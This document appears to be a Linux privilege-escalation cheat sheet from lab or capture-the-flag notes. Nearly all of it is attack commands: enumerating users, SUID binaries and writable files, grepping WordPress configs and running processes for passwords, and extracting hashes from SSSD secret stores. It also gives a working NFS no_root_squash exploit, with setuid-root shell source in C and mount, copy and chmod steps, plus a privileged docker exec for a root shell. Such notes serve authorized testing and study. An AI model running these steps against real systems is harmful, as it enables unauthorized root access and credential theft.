- To check information about system:
cat /etc/issue; cat /etc/*-release; uname -r; arch - To get cpu info:
lscpu - To check valid login shells :
cat /etc/shells - View all users:
cat /etc/passwdOnly usernames:cat /etc/passwd | cut -f1 -d: - Check for shellshock :
grep "*sh$" /etc/passwd - Last login:
lastlog - Check sudo version is
1.8.31use this exploit
-
If wanna search recursively in a directory:
grep -Horn <text> <dir>To print full line: exclude
-o
- Check for groups
cat /etc/group - To list interesting groups:
getent group sudo - If user in adm group check:
/var/logs - Check id with
ls -lnand if uid is different and nfs share is present do the nfs-privesc.md - Check for capabilities.md with
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
- Check logrotate.md
- Netstat:
- All:
netstat -antup - Listening connections:
netstat -plunt
- All:
- Check DNS:
/etc/hosts -
ifconfigorip aif it is dual homed, etc. -
/etc/resolv.confif the host is configured to use internal DNS it can be starting point to query Active Directory. - To see which other hosts the target has been communicating with we can use
arp -a
- When creating a Docker container if -h or -hostname is not specified then hostname is container name.
- Example hostname of docker container:
efaa6f5097ed
- Example hostname of docker container:
-
.dockerenvin root directory - To evaluate use CDK Refer: Forgotten-vulnlab
- If sudo access on docker exec
sudo docker exec --privileged --user 0 -it container_name /bin/sh
- To mount c drive in WSL
mount -t drvfs 'c:' /mnt/c
- Check for unmounted drives with
lsblkorfdisk -l -
lsblkto enumerate information about block devices (hard disks, USB drives, optical drives). -
lpstatto check for printers
- Check for NFS with
showmount -e <ip> - Then
cat /etc/exports. If (rw,no_root_squash) then we can create setuid binary on bash:
shell.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);setgid(0);system("/bin/bash")
} - Compile and copy to nfs:
sudo mount -t nfs 10.129.2.12:/tmp /mnt
cp shell /mnt
chmod u+s /mnt/shell- Run it after switching to low privileged session:
./shell
- To find .conf files:
find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null- To find setuid(SUID) binaries:
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null- To get all hidden files:
find / -type d -name ".*" -ls 2>/dev/null- To find scripts:
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"- To check for writable directories:
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/nullor writable files:
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null- If wordpress then it is quite common to have passwords in the config file:
cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'- Check running processes:
-
ps aux--> only rootps aux | grep root -
watch -n 1 "ps -aux | grep pass"- to get entries with password -
ps fauxww -
ps -ewwo pid,user,cmd --forest - If doas is present then check config file which can be found with
-
find / -name doas.conf 2>/dev/null-
dpkg -lto list packages - If no sudo access: pspy:
./pspy64 -pf -i 1000 - To add current path to $PATH:
PATH=.:${PATH}- To check cron jobs try ALL THESE:
-
crontab -l(Run with sudo too) -
ls -lah /etc/cron* -
grep "CRON" /var/log/syslog- To check cron logs
-
- To check binaries:
ls -l /bin /usr/bin/ /usr/sbin/ - To check installed packages:
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list- To check gtfo bins against installed packages (run the previous command before this):
for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done- Strace can be used to trace the system calls and signal processing of any command
- Check
/etc/krb5.conf - If root user then use KeyTabExtract
- Check for hashes:
strings /var/lib/sss/secrets/secrets.ldb | grep '\$'
- In
/var/lib/sss/db:
strings cache_cerberus.local.ldb | grep '\$'
Check for cache